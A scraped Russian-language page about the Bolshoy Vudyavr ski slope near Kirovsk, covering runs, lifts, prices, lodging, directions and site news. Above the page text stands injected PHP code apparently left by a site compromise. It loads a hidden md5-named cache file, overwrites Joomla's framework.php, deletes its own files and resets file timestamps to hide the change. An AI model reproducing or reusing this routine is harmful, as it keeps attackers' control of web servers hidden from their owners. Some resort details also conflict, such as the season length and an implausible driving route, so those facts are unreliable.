$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Большой Вудъявр | горнолыжки
Баннер

Большой Вудъявр

Кировск

Описание

Обсудить на форуме...

Красивые фото Большой Вудъявр

[Большой Вудъявр на карте ]

Горнолыжный склон "Большой Вудъявр" расположен в самом центре Кольского полуострова - имеет самую высокую точку 1060м над уровнем моря. Поэтому является самым высокогорным курортом не только в Хибинах но и на всем Северо-Западе России. Перепад высот на курорте составляет 550м! Он может похвастаться широкими, отвечающими всем европейским нормам трассами, имеющими сертификат FIS. Они придутся по душе как профессионалам так и начинающим спортсменам, любителям зимних видов спорта. На курорте вы найдёте и трассы для самых маленьких спортсменов, на которые можно без опаски отпускать своих детей. Бывалые горнолыжники и соноубордисты могут показать своё умение на "чёрных" трассах или в зонах фрирайда.

Инфраструктура курорта также радует своим оснащением и разнообразием: современные подъёмники, трассы общей протяженностью 30 000м, квалифицированные инструкторы, прокат горнолыжного инвентаря, камеры хранения и конечноже множество кафе в которых можно согреться и поделиться впечатлениями. Из-за уникального климата горнолыжный сезон длиться до конца мая.

Но прежде чем отправляться на курорт посмотрите что твориться с погодой и что на трассах.

Характеристики склонов

Каждый день все основные маршруты непременно подготавливают ретраками «Pisten Bully», они идеально выравнивыют и уплотняют склон, давая вам почувствовать полный контроль над доской. Для катания в тёмное время суток трассы курорта оснащены освещением.

Покорение горнолыжного комплекса Большой Будъявр стоит начинать с вершин горного массива Айкуайвенчорр. Там, на уровне 1060м. начинаються основные горнолыжные маршруты комплекса.

Перепад высот на маршрутах составляет 550м, любой горнолыжник или сноубордист найдёт где оставить свой след. Учебный склон, широкие укатанные трассы с наклоном до 40%, сноу-парк а также две широких целинных трассы не дадут скучать никому!

Тип курорта: горнолыжный
Сезон катания: с декабря по апрель

Подъемники

Для того, чтобы добраться до вершины необходимо проехать на двух бугельных подъёмниках 1750м и 1150м соответственно. Их пропускная способность 600 чел\час. Параллельно им построен ещё один подъёмник протяженностью 1800м, пропускной способностью 1000чел\час.

Всего : 5
Гондольных: 0
Кресельных: 0
Бугельных: 5

Склоны

Перепад высот: 550м
Трасс/подъемников:9\5
Протяженность трасс: 30 000 м
Ночное освещение: имееться
Искусственное оснежение: есть

Сложность трасс

Зелёные: 20%
Красные: 60%
Черные: 20%

Время работы

с 10 до 17-18, или пока катается не менее 15 человек, без выходных.

Удобства

Гриль бар, стоянка, прокат снаряжения, атракционы, инструкторы.

 

Размещение

Дешевле всего снять жильё в г.Кировск (от 400р. чел\сут.), удобней всего разместиться в двухэтажных домиках недалеко от самого курорта (от 700р. чел\сут)

Как добираться

Как доехать до ГЛЦ Большой Вудъявр

самолётом

До аэропорта Хибины, затем на пригородных автобусах в г.Кировск, что в 20км от аэропорта и 12км. от горнолыжного комплекса "Большой Вудъявр"

поездом

Конечная железнодорожная станция ветки (22 км) от города Апатиты

на автобусе

Непосредственно до Кировска.

на автомобиле

По трассе Р123 до Ленинградской области, затем до Никольского(20км) - Отрадного(7км) и наконец до Кировска

Контакты

г. Кировск
ул. x-Гор.комплекс, рудник

тел.34614 - Начальник комплекса (стоит автоответчик с актуальной информацией о погоде, открытых трассах и запущенных подъёмниках)
тел.34619 - Касса/Прокат

Цены

Большой Вудъявр Цены

1 день с 10:00 до закрытия – взрослый 900руб., детский и льготный 700руб.

Коментарии:

 
.

Последние новости

Популярные статьи

Новости
Открытие сезона на ГЛЦ "Царевщина"

Ну вот и дождались любители горных лыж и сноуборда открытия ГЛЦ "Царевщина". Сегодня был полноценный рабочий день на этом комплексе. Снегу накидали достаточно, земли нигде не видно. В некоторых местах есть лёд. Народу немного, на подъёмнике очередей нет. Цены остались на уровне прошлого сезона: 1 смена с 10 до 15 - 600р, 2 смена с 13 до 17 - 700р, 3 смена с 17 до 21 - 300р (в выходные дни). В будние дни соответственно 250 - 300 - 200руб. Работает как всегда только центральная трасса.

 
Новости ГЛК Красная глинка

По заявлениям представителей ГЛК  Красная Глинка, что неподалёку от Самары, открытие намечено не 2 декабря, в настоящее время активно идёт подготовка склонов. На Юге убрали не работающий подъемник, трасса стала шире. Сейчас снежат Восточный склон. К открытию скорее всего будут работать Центр, Восток и если успеют то и Юг.

 
Появился новый раздел "Народный магазин"
Подробнее ...
Большой Вудъявр | горнолыжки

Как доехать на машине
*От:
*До:
Дай +1 :)
Сохранить в моб...
Яндекс.Метрика